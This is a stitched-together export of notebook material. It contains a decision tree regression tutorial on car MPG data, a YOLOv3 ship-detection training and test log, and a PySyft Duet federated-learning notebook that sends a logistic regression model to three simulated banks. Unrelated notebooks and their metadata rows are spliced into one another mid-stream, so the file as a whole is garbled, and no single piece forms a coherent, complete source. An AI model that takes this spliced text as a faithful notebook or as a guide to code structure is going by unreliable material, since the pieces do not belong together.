"## Decision Tree Regression\n\nRecall our problem from last time, trying to predict the real-valued MPG for each car. In data science, problems where one tries to predict a real-valued number is known as regression. As with classification, much of the intuition for splitting data based on values of known observables applies:",
"_____no_output_____"
]
],
[
[
"from mpl_toolkits.mplot3d import Axes3D\ndef plot_regression_data(df, info_col_1, info_col_2, target_column):\n\n # Make the plot square\n plt.rcParams['figure.figsize'] = [12.0, 8.0]\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.plot_trisurf(df[info_col_1], df[info_col_2], df[target_column], cmap=plt.cm.viridis, linewidth=0.2)\n ax.set_xlabel(info_col_1)\n ax.set_ylabel(info_col_2)\n ax.set_zlabel(target_column);\n ax.view_init(60, 45)\n\n plt.show()\n\nplot_regression_data(mpg_df, \"acceleration\", \"weight\", \"mpg\")",
"_____no_output_____"
]
],
[
[
"At a high level, one could imagine splitting the data recursively, assigning an estimated MPG to each side of the split. On more thoughtful reflection, some questions emerge:\n- how do predict a real number at a leaf node given the examples that \"filter\" to that node?\n- how do we assess the effectiveness of a particular split? \n\nAs with decision tree classification, there are many valid answers to both of these questions. A typical approach involves collecting all nodes that filter to a leaf, computing the mean target value, and using this as a prediction. The effectiveness of a split can then be measured by computing the mean difference between all true values and this prediction.\n\nAs before, we can easily experiment with decison tree regression models using sklearn: ",
"_____no_output_____"
]
],
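[
[
"# Illustrative only: a tiny hand-rolled version of the two ideas described above.\n# The helper names below are invented for this sketch and are not part of sklearn or the course code;\n# sklearn's DecisionTreeRegressor (next cell) is what we actually use.\nimport numpy as np\n\ndef leaf_prediction(targets):\n    # Predict the mean target (MPG) of the examples that filter to a leaf\n    return np.mean(targets)\n\ndef split_mse(values, targets, threshold):\n    # Mean squared error of predicting each side's mean after splitting on values <= threshold\n    left, right = targets[values <= threshold], targets[values > threshold]\n    sse = np.sum((left - leaf_prediction(left)) ** 2) + np.sum((right - leaf_prediction(right)) ** 2)\n    return sse / len(targets)\n\n# Example: quality of a split on weight at 3000 lbs (lower is better); assumes mpg_df from above\nsplit_mse(mpg_df[\"weight\"].values, mpg_df[\"mpg\"].values, 3000)",
"_____no_output_____"
]
],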
[
[
"from sklearn.tree import DecisionTreeRegressor\n\nregressor = DecisionTreeRegressor(max_depth=1, criterion=\"mse\") # note the use of mse (mean squared error) as a criterion\n\nregressor.fit(mpg_df[predictor_cols], mpg_df[\"mpg\"])",
"_____no_output_____"
],
[
"visualize_tree(regressor, predictor_cols, [\"n\", \"y\"])",
"_____no_output_____"
]
],
[
[
"As before, we can also view the \"regression surface\"",
"_____no_output_____"
]
],
[
[
"def Regression_Surface(data, col1, col2, target, model):\n # Get bounds\n x_min, x_max = data[col1].min(), data[col1].max()\n y_min, y_max = data[col2].min(), data[col2].max()\n \n # Create a mesh\n xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))\n meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])\n \n tdf = data[[col1, col2]]\n model.fit(tdf, target)\n Z = model.predict(meshed_data).reshape(xx.shape)\n\n \n plt.figure(figsize=[12,7])\n plt.title(\"Decision surface\") \n plt.ylabel(col1)\n plt.xlabel(col2)\n \n cs = plt.contourf(xx, yy, Z, alpha=0.4, cmap=plt.cm.coolwarm)\n\n plt.scatter(data[col1], data[col2], c=target, cmap=plt.cm.coolwarm)\n plt.show() \n\ntree_depth=1\nRegression_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"mpg\"], DecisionTreeRegressor(max_depth=tree_depth, criterion=\"mse\"))",
"_____no_output_____"
]
],
[
[
"Let's also take a look using linear regression!",
"_____no_output_____"
]
],
[
[
"Regression_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"mpg\"], linear_model.LinearRegression())",
"_____no_output_____"
]
],
[
[
"How about a more complicated model? Let's try random forrest regression!",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestRegressor\nRegression_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"mpg\"], RandomForestRegressor(n_estimators=10))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb533414b084bfdd3a925dc83704b80b57dc70bf | 867,142 | ipynb | Jupyter Notebook | Baseline_yolov3/train800_96.ipynb | JunHyungKang/SAROD_ICIP | 71585951f64dc1cc22ed72900eff81f747edec77 | [
"MIT"
] | 1 | 2021-10-14T23:40:11.000Z | 2021-10-14T23:40:11.000Z | Baseline_yolov3/train800_96.ipynb | JunHyungKang/SAROD_ICIP | 71585951f64dc1cc22ed72900eff81f747edec77 | [
"MIT"
] | 1 | 2021-01-09T08:00:30.000Z | 2021-01-09T08:00:30.000Z | Baseline_yolov3/train800_96.ipynb | JunHyungKang/SAROD_ICIP | 71585951f64dc1cc22ed72900eff81f747edec77 | [
"MIT"
] | 3 | 2021-01-07T11:27:46.000Z | 2021-01-31T04:03:07.000Z | 93.887181 | 288 | 0.568886 | [
[
[
"!python train96.py --epochs 1000 --batch_size 24 --model_def config/yolov3-custom96.cfg --data_config config/custom96.data --img_size 96",
"GPU device True\nNamespace(batch_size=24, checkpoint_interval=1, compute_map=False, data_config='config/custom96.data', epochs=1000, evaluation_interval=1, gradient_accumulations=2, img_size=96, model_def='config/yolov3-custom96.cfg', multiscale_training=True, n_cpu=8, pretrained_weights=None)\n \n---- [Epoch 0/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 15 | 30 | 60 |\n| loss | 5.318177 | 9.522597 | 27.183088 |\n| x | 0.057808 | 0.097499 | 0.077958 |\n| y | 0.067866 | 0.077317 | 0.063953 |\n| w | 0.999525 | 0.197551 | 0.134172 |\n| h | 0.334866 | 0.424033 | 0.199209 |\n| conf | 3.824442 | 8.681787 | 26.697584 |\n| cls | 0.033670 | 0.044411 | 0.010211 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.000000 | 0.000000 | 0.000000 |\n| recall75 | 0.000000 | 0.000000 | 0.000000 |\n| precision | 0.000000 | 0.000000 | 0.000000 |\n| conf_obj | 0.172566 | 0.222942 | 0.295796 |\n| conf_noobj | 0.019452 | 0.067396 | 0.218786 |\n+------------+--------------+--------------+--------------+\nTotal loss 42.02386474609375\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:01<00:00, 44.65it/s]\nComputing AP: 100%|██████████████████████████████| 1/1 [00:00<00:00, 182.83it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00000 |\n+-------+------------+---------+\n---- mAP 0.0\n \n---- [Epoch 1/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 15 | 30 | 60 |\n| loss | 3.473345 | 3.818047 | 9.194133 |\n| x | 0.110580 | 0.057297 | 0.078679 |\n| y | 0.098530 | 0.083381 | 0.072344 |\n| w | 0.735206 | 0.189965 | 0.527540 |\n| h | 0.225367 | 0.130042 | 0.165985 |\n| conf | 2.297500 | 3.320297 | 8.262206 |\n| cls | 0.006162 | 0.037065 | 0.087379 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.153846 | 0.428571 | 0.214286 |\n| recall75 | 0.000000 | 0.071429 | 0.071429 |\n| precision | 0.166667 | 0.093750 | 0.011407 |\n| conf_obj | 0.400156 | 0.389869 | 0.449144 |\n| conf_noobj | 0.009014 | 0.020010 | 0.069420 |\n+------------+--------------+--------------+--------------+\nTotal loss 16.485525131225586\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:02<00:00, 31.60it/s]\nComputing AP: 100%|███████████████████████████████| 1/1 [00:00<00:00, 89.68it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00009 |\n+-------+------------+---------+\n---- mAP 8.713263519231053e-05\n \n---- [Epoch 2/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 11 | 22 | 44 |\n| loss | 2.284829 | 2.501768 | 4.162377 |\n| x | 0.077931 | 0.074175 | 0.076291 |\n| y | 0.053745 | 0.082246 | 0.073930 |\n| w | 0.161168 | 0.046163 | 0.062310 |\n| h | 0.154466 | 0.225721 | 0.108232 |\n| conf | 1.829767 | 2.067030 | 3.805388 |\n| cls | 0.007751 | 0.006433 | 0.036227 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.363636 | 0.090909 | 0.454545 |\n| recall75 | 
0.090909 | 0.090909 | 0.090909 |\n| precision | 0.363636 | 1.000000 | 0.064103 |\n| conf_obj | 0.434757 | 0.356718 | 0.445910 |\n| conf_noobj | 0.008006 | 0.009383 | 0.027810 |\n+------------+--------------+--------------+--------------+\nTotal loss 8.948973655700684\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:01<00:00, 44.23it/s]\nComputing AP: 100%|██████████████████████████████| 1/1 [00:00<00:00, 223.59it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00117 |\n+-------+------------+---------+\n---- mAP 0.0011681217675163997\n \n---- [Epoch 3/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 10 | 20 | 40 |\n| loss | 4.426109 | 4.191194 | 4.576394 |\n| x | 0.058745 | 0.076109 | 0.085991 |\n| y | 0.063266 | 0.079254 | 0.108918 |\n| w | 0.338564 | 0.127939 | 0.132152 |\n| h | 0.609314 | 0.726106 | 0.130827 |\n| conf | 3.353089 | 3.159993 | 4.032557 |\n| cls | 0.003131 | 0.021793 | 0.085948 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.222222 | 0.285714 | 0.217391 |\n| recall75 | 0.000000 | 0.095238 | 0.043478 |\n| precision | 0.800000 | 0.214286 | 0.052632 |\n| conf_obj | 0.263703 | 0.317493 | 0.312342 |\n| conf_noobj | 0.006122 | 0.010345 | 0.020651 |\n+------------+--------------+--------------+--------------+\nTotal loss 13.193696975708008\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:01<00:00, 51.45it/s]\nComputing AP: 100%|██████████████████████████████| 1/1 [00:00<00:00, 250.83it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00404 |\n+-------+------------+---------+\n---- mAP 0.0040403951110364504\n \n---- [Epoch 4/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 11 | 22 | 44 |\n| loss | 3.378636 | 2.855823 | 3.273387 |\n| x | 0.061738 | 0.061798 | 0.068173 |\n| y | 0.046923 | 0.063899 | 0.053193 |\n| w | 0.221638 | 0.112354 | 0.055881 |\n| h | 0.389658 | 0.359653 | 0.184158 |\n| conf | 2.655482 | 2.242971 | 2.841286 |\n| cls | 0.003198 | 0.015148 | 0.070696 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.352941 | 0.470588 | 0.235294 |\n| recall75 | 0.117647 | 0.117647 | 0.058824 |\n| precision | 0.375000 | 0.266667 | 0.071429 |\n| conf_obj | 0.370246 | 0.461309 | 0.380147 |\n| conf_noobj | 0.006841 | 0.008455 | 0.014260 |\n+------------+--------------+--------------+--------------+\nTotal loss 9.50784683227539\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:02<00:00, 40.54it/s]\n"
],
[
"!python test96.py --weights_path checkpoints96/yolov3_ckpt_999.pth --model_def config/yolov3-custom96.cfg --data_config config/custom96.data --img_size=800",
"Namespace(batch_size=8, class_path='data/coco.names', conf_thres=0.001, data_config='config/custom96.data', img_size=800, iou_thres=0.5, model_def='config/yolov3-custom96.cfg', n_cpu=8, nms_thres=0.5, weights_path='checkpoints96/yolov3_ckpt_999.pth')\nCompute mAP...\nDetecting objects: 0%| | 0/493 [00:00<?, ?it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0038_3000_3800_2400_3200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0075_0_800_600_1400_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0117_3600_4400_4200_5000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0126_6000_6800_3000_3800_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0099_600_1400_0_800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0112_0_800_1200_2000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0031_1800_2600_3000_3800_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0025_1800_2600_0_800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0029_5560_6360_5400_6200_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0007_600_1400_7800_8600_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0001_0_800_10190_10990_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 0%| | 1/493 [00:01<09:42, 1.18s/it]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0048_1200_2000_2400_3200_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0111_6000_6800_9600_10400_2.txt\"\n boxes 
= torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0034_1800_2600_5400_6200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0014_3600_4400_4200_5000_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 0%| | 2/493 [00:01<07:40, 1.07it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0018_2400_3200_5400_6200_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0121_0_800_3600_4400_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0059_1200_2000_4800_5600_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▏ | 3/493 [00:01<06:08, 1.33it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0048_1800_2600_4800_5600_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▏ | 4/493 [00:02<05:12, 1.57it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0131_12000_12800_10200_11000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0033_0_800_8400_9200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0012_2400_3200_3600_4400_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0025_5460_6260_7200_8000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▏ | 5/493 [00:02<04:32, 1.79it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0002_2400_3200_3000_3800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0008_5160_5960_7200_8000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0033_4200_5000_0_800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 
1%|▎ | 6/493 [00:02<04:02, 2.01it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0108_600_1400_6000_6800_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0042_3000_3800_6000_6800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0007_4200_5000_2400_3200_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▎ | 7/493 [00:03<03:40, 2.21it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0028_3600_4400_3600_4400_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0024_4800_5600_2400_3200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0070_3100_3900_2400_3200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0097_3000_3800_1800_2600_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb533d0058d8c60de5fc661f0bde540353539532 | 141,941 | ipynb | Jupyter Notebook | notebooks/eXate_samples/pysyft/duet_multi/.ipynb_checkpoints/5.0-mg-central-aggregator-checkpoint.ipynb | pbaiz/mmlspark | ab13ad658563da0b1c65636f9c92d9a02b637404 | [
"MIT"
] | null | null | null | notebooks/eXate_samples/pysyft/duet_multi/.ipynb_checkpoints/5.0-mg-central-aggregator-checkpoint.ipynb | pbaiz/mmlspark | ab13ad658563da0b1c65636f9c92d9a02b637404 | [
"MIT"
] | null | null | null | notebooks/eXate_samples/pysyft/duet_multi/.ipynb_checkpoints/5.0-mg-central-aggregator-checkpoint.ipynb | pbaiz/mmlspark | ab13ad658563da0b1c65636f9c92d9a02b637404 | [
"MIT"
] | null | null | null | 102.115827 | 34,072 | 0.829493 | [
[
[
"# Syft Duet for Federated Learning - Central Aggregator\n\n## Setup\n\nFirst we need to install syft 0.3.0 because for every other syft project in this repo we have used syft 0.2.9. However, a recent update has removed a lot of the old features and replaced them with this new 'Duet' function. To do this go into your terminal and cd into the repo directory and run:\n\n> pip uninstall syft\n\nThen confirm with 'y' and hit enter.\n\n> pip install syft==0.3.0\n\nNOTE: Make sure that you uninstall syft 0.3.0 and reinstall syft 0.2.9 if you want to run any of the other projects in this repo. Unfortunately when PySyft updated from 0.2.9 to 0.3.0 it removed all of the previous functionalities for the FL, DP, and HE that have previously been iplemented.",
"_____no_output_____"
]
],
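[
[
"# Optional convenience cell (left commented out so it does not run automatically):\n# the same version switch described above, run from inside the notebook instead of a terminal.\n# This assumes pip is available on the notebook's PATH; adjust for conda environments if needed.\n# !pip uninstall -y syft\n# !pip install syft==0.3.0",
"_____no_output_____"
]
],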
[
[
"# Double check you are using syft 0.3.0 not 0.2.9\n# !pip show syft",
"_____no_output_____"
],
[
"import syft as sy\nimport pandas as pd\nimport torch",
"_____no_output_____"
]
],
[
[
"## Initialising the Duets\n\n",
"_____no_output_____"
]
],
[
[
"portuguese_bank_duet = sy.duet(\"317e830fd06779d42237bcee6483427b\")",
"_____no_output_____"
]
],
[
[
">If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first bank is connected before attempting the connect to the second bank.",
"_____no_output_____"
]
],
[
[
"american_bank_duet = sy.duet(\"d9de11127f79d32c62aa0566d5807342\")",
"_____no_output_____"
]
],
[
[
">If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first and second banks are connected before attempting the connect to the third bank.",
"_____no_output_____"
]
],
[
[
"australian_bank_duet = sy.duet(\"a33531fab99dc31aa53c97e3166b5922\")",
"_____no_output_____"
]
],
[
[
">If the connection is established then there should be a green message above saying 'CONNECTED!'. This should mean that you have connected three seperate duets to three different 'banks' around the world!",
"_____no_output_____"
],
[
"## Check the data exists in each duet",
"_____no_output_____"
]
],
[
[
"portuguese_bank_duet.store.pandas",
"_____no_output_____"
],
[
"american_bank_duet.store.pandas",
"_____no_output_____"
],
[
"australian_bank_duet.store.pandas",
"_____no_output_____"
]
],
[
[
">As a proof of concept for the security of this federated learning method. If you wanted to see/access the data from this side of the connection you can't without permission. To try thi run;\n\n```python\nname_bank_duet.store[\"tag\"].get()\n```\n\n>Where you replace 'name' with the specific banks name and the 'tag' with the data tag. This should through a permissions error and recommend that you request the data from that 'bank'. From here you should run;\n\n```python\nname_bank_duet.store[\"tag\"].request()\n# Or\nname_bank_duet.store[\"tag\"].get(request_block=True)\n```\n\n>Now you have sent a request to the 'bank' side of the connection - now you must wait until on their end they see this requesnt and type the code;\n\n```python\nduet.requests[0].accept()\n```\n\n>Once they accept the request, you can freely get the data on this end - however, for federated learning this should never be explicityl done on data. Only results of computation.",
"_____no_output_____"
],
[
"## Import Test data",
"_____no_output_____"
]
],
[
[
"test_data = pd.read_csv('datasets/test-data.csv', sep = ',')\ntest_target = pd.read_csv('datasets/test-target.csv', sep = ',')\ntest_data.head()",
"_____no_output_____"
],
[
"test_data = torch.tensor(test_data.values).float()\ntest_data",
"_____no_output_____"
],
[
"test_target = torch.tensor(test_target.values).float()\ntest_target",
"_____no_output_____"
],
[
"from sklearn.preprocessing import StandardScaler\n\nsc_X = StandardScaler()\ntest_data = sc_X.fit_transform(test_data)\ntest_data = torch.tensor(test_data).float()\ntest_data",
"_____no_output_____"
]
],
[
[
"## Initialise the local Model",
"_____no_output_____"
]
],
[
[
"class LR(sy.Module):\n\n def __init__(self, n_features, torch_ref):\n super(LR, self).__init__(torch_ref=torch_ref)\n self.lr = torch_ref.nn.Linear(n_features, 1)\n\n def forward(self, x):\n out = self.torch_ref.sigmoid(self.lr(x))\n return out",
"_____no_output_____"
],
[
"local_model = LR(test_data.shape[1], torch)",
"> Creating local model\n"
]
],
[
[
"## Send the Model to each connection",
"_____no_output_____"
]
],
[
[
"portuguese_bank_model = local_model.send(portuguese_bank_duet)",
"> Sending local model\n> Creating remote model\n Sending local layer: lr\n\n> Finished sending local model <\n\n\n"
],
[
"american_bank_model = local_model.send(american_bank_duet)",
"> Sending local model\n> Creating remote model\n Sending local layer: lr\n\n> Finished sending local model <\n\n\n"
],
[
"australian_bank_model = local_model.send(australian_bank_duet)",
"> Sending local model\n> Creating remote model\n Sending local layer: lr\n\n> Finished sending local model <\n\n\n"
]
],
[
[
"### Get the parameters for each model",
"_____no_output_____"
]
],
[
[
"portuguese_bank_parameters = portuguese_bank_model.parameters()",
"_____no_output_____"
],
[
"american_bank_parameters = american_bank_model.parameters()",
"_____no_output_____"
],
[
"australian_bank_parameters = australian_bank_model.parameters()",
"_____no_output_____"
]
],
[
[
"## Create Local torch of the connections 'remote' torch",
"_____no_output_____"
]
],
[
[
"portuguese_bank_remote_torch = portuguese_bank_duet.torch",
"_____no_output_____"
],
[
"american_bank_remote_torch = american_bank_duet.torch",
"_____no_output_____"
],
[
"australian_bank_remote_torch = australian_bank_duet.torch",
"_____no_output_____"
]
],
[
[
